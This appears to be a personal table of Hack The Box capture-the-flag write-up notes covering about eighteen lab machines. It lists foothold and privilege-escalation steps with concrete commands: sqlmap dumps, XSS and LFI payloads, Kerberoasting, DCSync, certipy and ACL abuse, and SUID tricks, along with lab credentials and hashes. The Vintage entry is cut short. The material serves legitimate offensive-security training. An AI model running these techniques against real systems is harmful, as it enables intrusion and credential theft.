VintageOld style of writeups. I’m refocusing on Windows Medium/Hard boxes from now on, so those writeups can get quite complex and it’s easier to put in screenshots. It’s difficult to fit that style of writing in my old and lazy way of creating writeups. This means lesser boxes, but more high quality writeups.
Box Name | Type | Steps | Lessons |
Monitored | Linux Easy | Foothold 1. blind sql injection in password reset 2. exfiltrate admin password from admin_users 3. hashcat to crack bcrypt password 4. login as admin 5. upload a webshell from the profile page 6. reverse shell PrivEsc 1. view .monitrc to get password for the other user2. as the other user, sudo -l to see what you can run3. https://book.hacktricks.xyz/linux-hardening/privilege-escalation/wildcards-spare-tricks#id-7z | 1. users and admin_users in laravel2. Hacking with 7z 3. be aware of rabbit holes |
Devvortex | Linux Easy | Foothold 1. fuzz vhost to find the dev page2. fuzz page to find joomla login page 3. find joomla version and it’s CVE 4. login to joomla as admin 5. modify php template to get webshell 6. on the server, login to mysql to get hash of other user 7. hashcat to crack the hash and get user flag PrivEsc 1. sudo -l to view sudo commands2. kill -BUS <pid> to generate a crash file in /var/crash/ 3. sudo apport-cli -c <crash file> 4. view report 5. in the viewer, start a bash shell with !/bin/bash | 1. Finding joomla version to see if there are exploits /administrator/manifests/files/joomla.xml 2. generating crash files |
Active | Windows Easy | Foothold 1. nmap the target to find SMB share 2. connect anonymously to Replication share3. pull Groups.xml that has a username and encrypted password4. use gpp-decrypt to decrypt the password5. connect to SMB Users share with the the username and passwordPrivEsc 1. using the cracked username and password, use impacket-getuserspans to get a TGS for Administrator 2. Kerberoast - Hashcat to crack the password for the TGS to get plaintext password for Administrator 3. using the cracked password, connect to the Users share again and navigate to Administrator desktop | 1. Groups.xml contains credentials that you can crack with gpp-decrypt They are stored in \\<DOMAIN>\sysvol\<DOMAIN>\policies\<id>\MACHINE\Preferences\Groups\Groups.xml 2. GetUserSPNs.py will attempt to fetch Service Principal Names that are associated with normal user accounts. What is returned is a ticket that is encrypted with the user account’s password, which can then be cracked offline. |
Builder | Linux Medium | Foothold 1. nmap the target to find open port that hosts website 2. fluff to scan vhost to find dev.builder.htb 3. use LFI to exploit vulnerable Jenkins version 4. LFI users.xml and /<user>/config.xml 5. hashcat to crack password PrivEsc 1. Once logged in as a user, LFI to get root password from /var/jenkins_home/credentials.xml 2. Create a groovy script to decrypt the SSH key for root user 3. Login as root | 1. Users in jenkins are stored in /var/jenkins_home/users/users.xml 2. User’s hashed passwords are in /var/jenkins_home/users/<user>/config.xml 3. Root hashed password is in /var/jenkins_home/credentials.xml |
Monitored | Linux Medium | Foothold 1. nmap UDP to find snmp port 161 open 2. snmpwalk to get credentials svc:XjH7VCehowpR1xZB 3. curl /api/v1/authenticate" to get token4. sqlmap to get api_key of Nagios_admin usersqlmap -u "https://nagios.monitored.htb//nagiosxi/admin/banner_message-ajaxhelper.php?action=acknowledge_banner_message&id=3&token=<auth token>" --level 5 --risk 3 -p id -T xi_users -D nagiosxi --dump -C username,api_key 5. create new user with API key curl -POST -k "https://nagios.monitored.htb/nagiosxi/api/v1/system/user?apikey=<nagios admin api key>&pretty=1" -d "username=baduser&password=baduser&name=baduser&email=baduser@monitored.htb&auth_level=admin" 6. create command in “Configure”>”Core Config Manager”>”Commands” to RCE7. create service to run our command in “Configure”>”Core Config Manager”>”Services” to execute the commandPrivEsc 1. sudo -l to view what commands you can run as sudo2. find a script that read the contents a file and adds it to a zip archive 3. create a symlink between that file and /root/root.txt 4. run the command as sudo to get the contents of the root flag | 1. scan everything, TCP and UDP 2. Nagios shenanigans 3. symlinks to access root files |
Greenhorn | Linux Easy | Foothold 1. nmap to reveal port 80 and 3000 2. download the source code from gitea on port 3000 3. get pass.php and crack it4. use CVE to upload web shell and get RCE PrivEsc 1. Run http server on the victim and download the PDF 2. depix the image to get the root password | 1. https://github.com/spipm/Depix to depixelate images |
IClean | Linux Medium | Foothold 1. XSS in quotation form to get admin session 2. SSTI in report generation 3. Use SSTI to get RCE and foothold 4. SSTI blacklists . and __ , so we play SSTI golf5. reading app.py , get mysql password6. in users table, get hash of user account and crack it7. get user flag PrivEsc 1. sudo -l and see that we can run qpdf 2. sudo qpdf --empty /tmp/pwn.pdf --add-attachment /root/root.txt -- 3. run a web server on the victim and download the pdf to attacker VM 4. open the pdf file and download the attachment to get root flag | 1. qpdf shenanigans |
PermX | Linux Easy | Foothold 1. ffuf vhost to find lms.permx.htb 2. CVE-2023-4220 to get foothold3. dump password from ~/app/.../configuration.php 4. reuse password to get access to user mtz PrivEsc 1. sudo -l and see that we can run /opt/acl.sh 2. /opt/acl.sh runs setfacl to change permissions of a file3. we can’t change the permissions of /root/root.txt directly as we don't have write permissions to /root folder4. /opt/acl.sh also checks if there are .. characters to prevent directory traversal5. we overcome this by creating a symlink to / ln -s / pwned 6. generate a dummy password openssl passed owned 7. modify permissions of /etc/passwd sudo /opt/acl.sh mtz rwx /home/mtz/pwned/etc/passwd 8. change the password of root to the newly generated password above9. su and enter the password to get root access | 1. how to pwn /etc/passwd if you have write access to it2. symlinks |
SolarLab | Windows Medium | Foothold 1. smbmap anonymous login to download the documents2. Use credentials in the documents to login to report.solarlab.htb on port 6791 3. RCE on reportlab , put payload in the date fieldPrivEsc 1. netstat -ano to find service running on 9090 2. chisel to port forward to attacker machine3. CVE to create admin user and upload webshell 4. look at C:\Program Files\Openfire\embedded-db\openfire.script to get admin password5. decrypt with 6. smbclient -N //solarlab.htb/C$ -U "Administrator%password" | 1. Chisel port forwarding 2. CVE exploits 3. SMB shenanigans |
Blazorized | Windows Medium | Foothold 1. ffuf to find admin.blazorized.htb 2. Download shared.dll to get the JWT signing key3. Craft your own key and put it in local storage at admin.blazorized.htb 4. SQL injection and xp_cmdshell to get RCEPrivEsc 1. DACL attack 1: Stealing SPN Find-InterestingDomainAcl -ResolveGUIDs | ?{$_.IdentityReferenceName -match "nu_1055"} 2. Get SPN and roast the ticket to get the password for RSA_4810 , then evil-winrm Set-DomainObject -Identity RSA_4810 -SET @{serviceprincipalname='test/tester'} Get-DomainSPNTicket -SPN test/tester 3. DACL attack 2: Modifiable Script Path Find-InterestingDomainAcl -ResolveGUIDs | ?{$_.IdentityReferenceName -match "RSA_4810"} 4. Upload rev.ps to a script folderC:\Windows\sysvol\sysvol\blazorized.htb\scripts\A32FF3AEAA23 5. Set script path for SSA_6010 Set-ADUser -Identity SSA_6010 -ScriptPath 'A32FF3AEAA23\rev.ps1' 6. Once authenticated as SSA_6010 , get meterpreter shell, load mimikatz and dcsync to get Administator hash7. PTH to get root.txt | 1. DACL attacks 2. Web Assembly Reversing 3. xp_cmdshell RCE |
Alert | Linux Easy | Foothold 1. Upload an MD file that contains an XSS payload <script> 2. send a message that contains a link to the hosted payload email=test%40test.com&message=<script src="http://alert.htb/visualizer.php?link_share=675155dfa06ca8.28692334.md 3. get messages.php and see that it makes a request that is vulnerable to LFI<h1>Messages</h1><ul><li><a href='messages.php?file=2024-03-10_15-48-34.txt'>2024-03-10_15-48-34.txt</a></li></ul> 4. LFI to get /etc/apache2/sites-enabled/000-default.conf 5. then LFI to get /var/www/statistics.alert.htb/.htpasswd and get albert hashalbert:$apr1$bMoRBJOg$igG8WBtQ1xYDTQdLjSWZQ/ 6. crack the hash (1600 | Apache $apr1$ MD5, md5apr1, MD5 (APR)) hashcat -m 1600 hash /usr/share/wordlists/rockyou.txt 7. SSH as Albert PrivEsc 1. run pspy64 to see cronjob /bin/sh -c /usr/bin/php -f /opt/website-monitor/monitor.php >/dev/null 2>&1 2. /opt/website-monitor/monitor.php imports config/configuration.php 3. we can edit config/configuration.php system(’chmod +s /bin/bash’) 4. get root | 1. proc/self/cwd to go to current directory, instead of guessing the directory path |
Administrator | Windows Medium | Foothold 1. enum4linux -u olivia -p ichliebedich -a 2. see that benjamin is part of Share Moderators local group3. olivia is part of Remote Management Users 4. winrm into the machine5. bloodhound 6. ethan can dcsync the DC7. emily has generic write on ethan 8. olivia has generic write on michael 9. change password for michael and login as michael10. michael has can force benjamin to change password11. use rpcclient as michael 12. setuserinfo2 benjamin 23 password123! 13. FTP as benjamin to download Backup.psafe3 14. hashcat -m 5200 Backup.psafe3 /usr/share/wordlists/rockyou.txt (tekieromucho)15. use passwordsafe to open up Backup.psafe3 to get emily’s passwordPrivEsc 1. Change password of ethan 2. Write an SPN to ethan $SecPassword = ConvertTo-SecureString 'UXLCI5iETUsIBoFVTj8yQFKoHjXmb' -AsPlainText -Force $Cred = New-Object System.Management.Automation.PSCredential('administrator.htb\emily', $SecPassword) Set-DomainObject -Credential $Cred -Identity administrator.htb\ethan -SET @{serviceprincipalname='nonexistent/BLAHBLAH'} Get-DomainSPNTicket -Credential $Cred administrator.htb\ethan | fl 3. Kerberoast ethan based on this newly created SPNimpacket-GetUserSPNs -dc-ip -request -outputfile kerberos administrator.htb/olivia 4. crack the hash (limpbizkit) 5. dc-sync to get admin hash impacket-secretsdump administrator.htb/ethan:"limpbizkit"@ 6. login as root | 1. Bloodhound 2. Find-InterestingDomainAcl 2. ACL abuses 3. DCSync can be done either on the machine ( mimikatz ) or remotely (impacket-secretsdump |
Certified | Windows Medium | Foothold 1. Remote Bloodhound to see that judith can modify management group, and management group has GenericWrite on mangement_svc Grant genericAll to Management group for judith.mader python3 ~/tools/windows/bloodyAD/bloodyAD.py --host certified.htb -d certified.htb -u judith.mader -p judith09 add genericAll Management judith.mader Once judith.mader has write access to Management , add the account to the groupnet rpc group addmem Management judith.mader -U judith.mader -S certified.htb Exploiting GenericWrite , we use certipy to get the NTLM hash of management_svc certipy shadow auto -u judith.mader@certified.htb -p judith09 -account management_svc 2. using the hash, we use psexec to get foothold PrivEsc 1. mangement_svc has GenericAll over ca_operator 2. Change the password of ca_operator 3. use certipy to find vulnerable template in the context of ca_operator certipy find -u 'ca_operator@certified.htb' -p password123\! -dc-ip -vulnerable 2. certipy shenanigans with the vulnerable templatehttps://research.ifcr.dk/certipy-4-0-esc9-esc10-bloodhound-gui-new-authentication-and-request-methods-and-more-7237d88061f7 certipy account update -username management_svc@certified.htb -hashes 00000000000000000000000000000000:a091c1832bcdd4677c28b5a6a1295584 -user ca_operator -upn administrator certipy auth -pfx administrator.pfx -dc-ip to get administrator hash 3. psexec and get root | 1. certipy shenanigans |
MonitorsThree | Linux Medium | Foothold 1. sql injection in monitorsthree.htb/forgot_password.php to get admin password2. Fuzz the site to get cacti.monitorsthree.htb 3. login with admin password 4. exploit CVE-2024-25641 to get RCE5. check one of the config files to get cactiuser:cactiuser for mysql6. get the hash of marcus and crack it with hashcathashcat -m 3200 hash /usr/share/wordlists/rockyou.txt 7. get local flag from marcus PrivEsc 1. There’s a service running on port 8200 2. chisel our way in to find Duplicati service runninghttps://medium.com/@STarXT/duplicati-bypassing-login-authentication-with-server-passphrase-024d6991e9ee 3. We also find Duplicati-server.sqlite which contains the server-passphrase and server-passphrase-salt 4. Look at http://localhost:8200/login/login.js to see how the server authenticates5. It first requests for a nonce value, then encrypts SHA256(nonce + SHA256(server-passphrase + server-passphrase-salt)) 6. It then sends the encrypted value back for verification 7. backup root.txt and restore it /source/home/marcus/root.txt | 1. Don’t forget vhost fuzzing!2. Duplicati shenanigans |
Trickster | Linux Medium | Foothold 1. Fuzz out a .git folder2. git-dumper to get the contents, and find the admin page3. CVE-2024-34716; XSS in image upload, and unrestricted file upload gets you a webshell https://ayoubmokhtar.com/post/png_driven_chain_xss_to_remote_code_execution_prestashop_8.1.5_cve-2024-34716/ 4. Find mysql password and hashcat password for james 5. su james to get localPrivEsc 1. Find another IP address in the network, and a service running at port 5000 2. chisel to access the service, which is changedetection.io 3. use James password to get access to changedetection.io admin page4. exploit the SSTI vulnerability in changedetection.io to get RCE on the Docker imagehttps://nvd.nist.gov/vuln/detail/CVE-2024-32651 5. As root on the Docker image, download the Backup Zip files 6. Unzip the contents and decode them using https://brotli.myl.moe/ 7. Get the password for adam 8. adam can run prusaslicer as sudo9. exploit to get root flag https://www.exploit-db.com/exploits/51983 | 1. Check for other IP address, not just service running on the localhost |
Heal | Linux Medium | Foothold 1. LFI to get sensitive data from Ruby files https://gist.github.com/harisec/b2deded5be122de0133dcd64dc8baa86 2. Crack the hash for the user 3. Login to the Lime Survey console 4. Exploit to get foothold https://github.com/Y1LD1R1M-1337/Limesurvey-RCE 5. Get reused password from config file PrivEsc 1. Find another service running on the local machine 2. Chisel to get access to it 3. RCE https://gitlab.com/gitlab-org/omnibus-gitlab/-/issues/8171 { | 1. Ruby sensitive files |
Linkvortex | Linux Easy | Foothold 1. Fuzz to get vhost 2. Fuzz vhost to get .git 3. Dump the .git directory with git-dumper 4. Find the password with grep -rne "password\s*= 5. git log to see the version of GhostCMS that vulnerable6. Exploit the CVE to get LFI 7. LFI to read /var/lib/ghost/config.production.json to get credentials for SSHPrivEsc 1. sudo -l to find out the command you can run2. The script checks if the link file points to root or etc 3. Create a nested link file so that a.png -> b.png -> /root/root.txt 4. Export the environment variable export CHECK_CONTENT=true 5. sudo /usr/bin/bash /opt/ghost/clean_symlink.sh b.png c.png | 1. Link file shenanigans 2. git log does not always contain everything3. Check /.git/logs/HEAD to see who clone the repo |
Vintage | Windows Hard | Foothold 1. ldapsearch -x -H ldap:// -b "dc=vintage,dc=htb" -w Rosaisbest123 -D p.rosa@vintage.htb 2. Find the DC name dc01.vintage.htb 3. python3 bloodhound.py -u P.Rosa -p 'Rosaisbest123' -d vintage.htb -c All -ns --zip -dc dc01.vintage.htb | ă…¤ |